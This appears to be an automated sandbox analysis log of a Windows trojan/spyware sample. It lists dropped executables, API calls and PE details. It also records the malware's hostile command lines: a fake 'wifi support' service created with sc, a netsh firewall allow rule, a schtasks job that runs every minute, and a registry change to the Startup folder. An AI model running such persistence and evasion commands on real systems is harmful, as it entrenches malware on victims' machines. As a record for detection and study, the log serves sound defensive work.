                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_054BF5C0 NtUnmapViewOfSection,
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_054BF6A0 NtAllocateVirtualMemory,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: 9334.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: B0F7.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 5C89.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 8783.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 9DFA.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 8783.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 8783.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 8783.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 8783.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 9DFA.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 9DFA.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 9DFA.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 9DFA.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: C7FA.exe.5.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: tijXCZsbGe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rifssweJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/23@82/18
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: tijXCZsbGe.exeVirustotal: Detection: 34%
                          Source: tijXCZsbGe.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\tijXCZsbGe.exe "C:\Users\user\Desktop\tijXCZsbGe.exe"
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeProcess created: C:\Users\user\Desktop\tijXCZsbGe.exe "C:\Users\user\Desktop\tijXCZsbGe.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\rifsswe C:\Users\user\AppData\Roaming\rifsswe
                          Source: C:\Users\user\AppData\Roaming\rifssweProcess created: C:\Users\user\AppData\Roaming\rifsswe C:\Users\user\AppData\Roaming\rifsswe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9334.exe C:\Users\user\AppData\Local\Temp\9334.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB31.exe C:\Users\user\AppData\Local\Temp\DB31.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E748.exe C:\Users\user\AppData\Local\Temp\E748.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start xzxafeeu
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe"
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5C89.exe C:\Users\user\AppData\Local\Temp\5C89.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6FB4.exe C:\Users\user\AppData\Local\Temp\6FB4.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8783.exe C:\Users\user\AppData\Local\Temp\8783.exe
                          Source: C:\Users\user\AppData\Local\Temp\6FB4.exeProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9DFA.exe C:\Users\user\AppData\Local\Temp\9DFA.exe
                          Source: C:\Users\user\AppData\Local\Temp\8783.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B0F7.exe C:\Users\user\AppData\Local\Temp\B0F7.exe
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeProcess created: C:\Users\user\Desktop\tijXCZsbGe.exe "C:\Users\user\Desktop\tijXCZsbGe.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9334.exe C:\Users\user\AppData\Local\Temp\9334.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB31.exe C:\Users\user\AppData\Local\Temp\DB31.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E748.exe C:\Users\user\AppData\Local\Temp\E748.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Users\user\AppData\Roaming\rifssweProcess created: C:\Users\user\AppData\Roaming\rifsswe C:\Users\user\AppData\Roaming\rifsswe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start xzxafeeu
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9334.tmpJump to behavior
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_00419E0A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,GetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4972:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_01
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: 0.0
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: hijaduvinijebup
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: mocisacatenu
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: wapejan
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: wovag
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: cbH
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: Piruvora
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: gukafipa
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: mawecamaxe
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: Hiwejanoji
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: Pusazide
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: hukujid
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCommand line argument: cbH
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCommand line argument: cbH
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCommand line argument: cbH
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCommand line argument: cbH
                          Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 35.0.F65C.exe.4d0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 35.0.F65C.exe.4d0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: tijXCZsbGe.exeStatic PE information: More than 200 imports for KERNEL32.dll
                          Source: tijXCZsbGe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: tijXCZsbGe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: tijXCZsbGe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: tijXCZsbGe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: tijXCZsbGe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: tijXCZsbGe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: tijXCZsbGe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: C:\zazadix dori\kol.pdb source: DB31.exe, 00000010.00000000.772191492.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 5C89.exe, 00000026.00000003.849959984.00000000030D0000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987438014.0000000003010000.00000040.00000001.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771517190.0000000004E2A000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: powrprof.pdbL source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.772634136.0000000003190000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771566987.0000000003190000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdbM source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: C:\buti15\juyekuzotaj-yodod\ciso_pematufuz.pdb source: E748.exe, 00000011.00000000.781295267.0000000000401000.00000020.00020000.sdmp, E748.exe, 00000011.00000002.957299537.00000000008A2000.00000004.00000001.sdmp, gecrjwsv.exe, 00000020.00000000.799382925.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.896342042.0000000000C4F000.00000004.00000001.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 5C89.exe, 00000026.00000003.849959984.00000000030D0000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987438014.0000000003010000.00000040.00000001.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.772634136.0000000003190000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771566987.0000000003190000.00000004.00000001.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9334.exe, 0000000B.00000000.759170928.0000000000413000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767055660.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000002.803672016.0000000002F80000.00000002.00020000.sdmp
                          Source: Binary string: `C:\buti15\juyekuzotaj-yodod\ciso_pematufuz.pdbh source: E748.exe, 00000011.00000000.781295267.0000000000401000.00000020.00020000.sdmp, E748.exe, 00000011.00000002.957299537.00000000008A2000.00000004.00000001.sdmp, gecrjwsv.exe, 00000020.00000000.799382925.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.896342042.0000000000C4F000.00000004.00000001.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 5C89.exe, 00000026.00000002.987710608.0000000003250000.00000040.00000001.sdmp, 5C89.exe, 00000026.00000003.853855551.0000000003300000.00000004.00000001.sdmp
                          Source: Binary string: cfgmgr32.pdbH source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
